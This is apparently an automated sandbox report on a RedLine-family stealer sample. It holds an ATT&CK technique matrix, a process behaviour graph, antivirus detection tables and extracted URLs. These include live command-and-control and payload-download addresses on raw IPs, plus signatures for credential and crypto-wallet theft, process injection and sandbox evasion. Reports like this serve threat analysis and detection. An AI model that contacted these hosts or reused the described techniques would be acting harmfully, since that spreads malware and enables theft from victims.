                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Disable or Modify Tools
                                2
                                OS Credential Dumping
                                1
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                14
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Command and Scripting Interpreter
                                11
                                Scheduled Task/Job
                                512
                                Process Injection
                                11
                                Deobfuscate/Decode Files or Information
                                111
                                Input Capture
                                3
                                File and Directory Discovery
                                Remote Desktop Protocol4
                                Data from Local System
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts11
                                Scheduled Task/Job
                                21
                                Registry Run Keys / Startup Folder
                                11
                                Scheduled Task/Job
                                4
                                Obfuscated Files or Information
                                Security Account Manager377
                                System Information Discovery
                                SMB/Windows Admin Shares1
                                Email Collection
                                11
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                                Registry Run Keys / Startup Folder
                                1
                                Install Root Certificate
                                NTDS1
                                Query Registry
                                Distributed Component Object Model111
                                Input Capture
                                4
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script32
                                Software Packing
                                LSA Secrets10101
                                Security Software Discovery
                                SSHKeylogging125
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Timestomp
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                DLL Side-Loading
                                DCSync481
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                Masquerading
                                Proc Filesystem1
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt481
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                Hidden Files and Directories
                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472622 Sample: mlk3kK6uLZ.exe Startdate: 13/07/2024 Architecture: WINDOWS Score: 100 89 api.proxyscrape.com 2->89 91 tmpfiles.org 2->91 93 3 other IPs or domains 2->93 111 Snort IDS alert for network traffic 2->111 113 Multi AV Scanner detection for domain / URL 2->113 115 Found malware configuration 2->115 117 33 other signatures 2->117 10 axplong.exe 45 2->10         started        15 espartu.exe 2->15         started        17 mlk3kK6uLZ.exe 5 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 95 43.153.49.49, 58985, 8888 LILLY-ASUS Japan 10->95 97 77.232.41.110, 58979, 80 EUT-ASEUTIPNetworkRU Russian Federation 10->97 81 C:\Users\user\AppData\Local\...\leg222.exe, PE32 10->81 dropped 83 C:\Users\user\AppData\Local\...\leg222[1].exe, PE32 10->83 dropped 167 Antivirus detection for dropped file 10->167 169 Multi AV Scanner detection for dropped file 10->169 171 Detected unpacking (changes PE section rights) 10->171 187 3 other signatures 10->187 21 leg222.exe 10->21         started        24 hello.exe 10->24         started        26 ZharkBOT.exe 10->26         started        38 4 other processes 10->38 173 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->173 175 Writes to foreign memory regions 15->175 177 Allocates memory in foreign processes 15->177 179 Injects a PE file into a foreign processes 15->179 28 FRaqbC8wSA1XvpFVjCRGryWt.exe 15->28         started        30 schtasks.exe 15->30         started        32 RegSvcs.exe 15->32         started        85 C:\Users\user\AppData\Local\...\axplong.exe, PE32 17->85 dropped 87 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 17->87 dropped 181 Tries to evade debugger and weak emulator (self modifying code) 17->181 183 Tries to detect virtualization through RDTSC time measurements 17->183 185 Hides threads from debuggers 17->185 34 axplong.exe 17->34         started        99 127.0.0.1 unknown unknown 19->99 36 WerFault.exe 2 19->36         started        file6 signatures7 process8 signatures9 119 Multi AV Scanner detection for dropped file 21->119 121 Machine Learning detection for dropped file 21->121 123 Contains functionality to inject code into remote processes 21->123 40 RegAsm.exe 3 21->40         started        44 WerFault.exe 19 16 21->44         started        135 3 other signatures 24->135 46 aspnet_regiis.exe 24->46         started        49 conhost.exe 24->49         started        125 Creates an undocumented autostart registry key 26->125 137 3 other signatures 26->137 59 2 other processes 26->59 127 Detected unpacking (changes PE section rights) 28->127 129 Detected unpacking (overwrites its own PE header) 28->129 139 2 other signatures 28->139 51 svchost.exe 28->51         started        53 schtasks.exe 28->53         started        55 conhost.exe 30->55         started        141 2 other signatures 34->141 131 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->131 133 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 38->133 143 3 other signatures 38->143 57 Hkbsse.exe 38->57         started        process10 dnsIp11 77 C:\Users\user\AppData\...\Z73fDV6g4L.exe, PE32 40->77 dropped 79 C:\Users\user\AppData\...\VP2pdCInvS.exe, PE32 40->79 dropped 145 Found many strings related to Crypto-Wallets (likely being stolen) 40->145 61 VP2pdCInvS.exe 40->61         started        65 Z73fDV6g4L.exe 4 40->65         started        103 85.28.47.70, 58981, 80 GES-ASRU Russian Federation 46->103 147 Tries to steal Mail credentials (via file / registry access) 46->147 149 Tries to harvest and steal ftp login credentials 46->149 151 Tries to harvest and steal browser information (history, passwords, etc) 46->151 163 2 other signatures 46->163 105 142.54.235.9 ZEROLAGUS United States 51->105 107 199.102.104.70 ZEROLAGUS United States 51->107 109 93 other IPs or domains 51->109 153 System process connects to network (likely due to code injection or exploit) 51->153 155 Creates multiple autostart registry keys 51->155 157 Hides threads from debuggers 51->157 165 4 other signatures 51->165 67 schtasks.exe 51->67         started        69 conhost.exe 53->69         started        159 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 59->159 161 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 59->161 71 conhost.exe 59->71         started        file12 signatures13 process14 dnsIp15 101 185.172.128.33, 49710, 8970 NADYMSS-ASRU Russian Federation 61->101 189 Antivirus detection for dropped file 61->189 191 Multi AV Scanner detection for dropped file 61->191 193 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 61->193 199 4 other signatures 61->199 195 Machine Learning detection for dropped file 65->195 197 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 65->197 73 conhost.exe 65->73         started        75 conhost.exe 67->75         started        signatures16 process17

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                mlk3kK6uLZ.exe63%ReversingLabsWin32.Spyware.Redline
                                mlk3kK6uLZ.exe72%VirustotalBrowse
                                mlk3kK6uLZ.exe100%AviraTR/Crypt.TPM.Gen
                                mlk3kK6uLZ.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\VP2pdCInvS.exe100%AviraTR/AD.RedLineSteal.zwufg
                                C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exe92%ReversingLabsWin32.Ransomware.RedLine
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exe82%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe92%ReversingLabsWin32.Ransomware.RedLine
                                C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe82%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe63%ReversingLabsWin32.Spyware.Redline
                                C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe72%VirustotalBrowse
                                C:\Users\user\AppData\Roaming\VP2pdCInvS.exe71%ReversingLabsByteCode-MSIL.Trojan.RedlineStealer
                                C:\Users\user\AppData\Roaming\VP2pdCInvS.exe82%VirustotalBrowse
                                C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe64%ReversingLabsByteCode-MSIL.Trojan.SpywareX
                                C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe45%VirustotalBrowse
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                bg.microsoft.map.fastly.net0%VirustotalBrowse
                                tmpfiles.org3%VirustotalBrowse
                                bflow-musico.fun13%VirustotalBrowse
                                foodbook.live14%VirustotalBrowse
                                api.proxyscrape.com1%VirustotalBrowse
                                windowsupdatebg.s.llnwi.net0%VirustotalBrowse
                                No Antivirus matches
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                bg.microsoft.map.fastly.net
                                199.232.214.172
                                truefalseunknown
                                tmpfiles.org
                                104.21.21.16
                                truefalseunknown
                                bflow-musico.fun
                                188.114.96.3
                                truefalseunknown
                                foodbook.live
                                15.235.80.22
                                truefalseunknown
                                api.proxyscrape.com
                                104.18.11.5
                                truetrueunknown
                                windowsupdatebg.s.llnwi.net
                                87.248.205.0
                                truefalseunknown
                                NameMaliciousAntivirus DetectionReputation
                                http://85.28.47.70/663cea891445d733/nss3.dlltrue
                                  https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=10000&country=all&ssl=all&anonymity=alltrue
                                    http://85.28.47.70/663cea891445d733/vcruntime140.dlltrue
                                      http://85.28.47.70/663cea891445d733/msvcp140.dlltrue
                                        http://77.232.41.110/2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111Cfalse
                                          http://85.28.47.70/663cea891445d733/softokn3.dlltrue
                                            45.66.231.158true
                                              http://77.232.41.110/large/svchost.exefalse
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sctVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    http://77.91.77.81/Kiru9gu/index.phpZwaxplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      http://tempuri.org/Entity/Id23ResponseDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        http://77.232.41.110/large/svchost.exetespartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          http://77.232.41.110/large/svchost.exerespartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            http://185.216.214.217/cdn-directory/wev233v22.exe.axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://tempuri.org/VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                http://tempuri.org/Entity/Id2ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crFRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000000.4044981578.00000000016E8000.00000080.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4457085471.0000000000938000.00000080.00000001.01000000.00000020.sdmpfalse
                                                                    http://tempuri.org/Entity/Id21ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          http://77.91.77.81/Kiru9gu/index.php~axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            http://77.91.77.81/Kiru9gu/index.php00241001axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/faultVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsatVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://77.232.41.110/large/svchost.exeBespartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        http://Passport.NET/tb_svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103913948.0000027EC1E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://85.28.47.70/aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                https://api.ip.sb/ipRegSvcs.exe, 00000025.00000002.4024278753.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe.5.drfalse
                                                                                                  http://77.232.41.110/large/svchost.exe:espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://stackoverflow.com/q/14436606/23354FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4552683302.00000000059A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      http://85.28.47.70:aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://crl.ver)svchost.exe, 0000000C.00000002.3724129711.000001AA922B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103455410.0000027EC0ECA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601~svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://tempuri.org/Entity/Id24ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://www.ecosia.org/newtab/VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://77.91.77.81/Kiru9gu/index.phptchaxplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://77.91.77.81/Kiru9gu/index.phpyo2axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        http://185.216.214.217/cdn-directory/gold543.exe8axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://77.91.77.81/Kiru9gu/index.phpK3Uaxplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://77.91.77.81/Kiru9gu/index.php:1caxplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://bflow-musico.fun/Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJwFkKrbuild16666.exe, 00000015.00000002.2727499728.00000166282C4000.00000004.00001000.00020000.00000000.sdmp, build16666.exe, 00000015.00000003.2724649462.00000166281EE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://tempuri.org/Entity/Id10ResponseDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          http://tempuri.org/Entity/Id5ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            http://tempuri.org/Entity/Id15ResponseDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              http://tempuri.org/Entity/Id10ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/sc~svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://api.proxyscrape.comLsvchost.exe, 0000002A.00000002.4552683302.00000000059A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    http://tempuri.org/Entity/Id8ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurisvchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfensvchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://api.proxyscrape.comsvchost.exe, 0000002A.00000002.4552683302.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://85.28.47.70/570d5d5e8678366c.php7taspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80600esvchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://77.232.41.110/large/hello.exeaxplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://77.91.77.81/lend/build16666.exeaxplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://85.28.47.70/570d5d5e8678366c.phptaspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://85.28.47.70/570d5d5e8678366c.phpEdgeaspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://85.28.47.70/570d5d5e8678366c.phplaspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpfalse
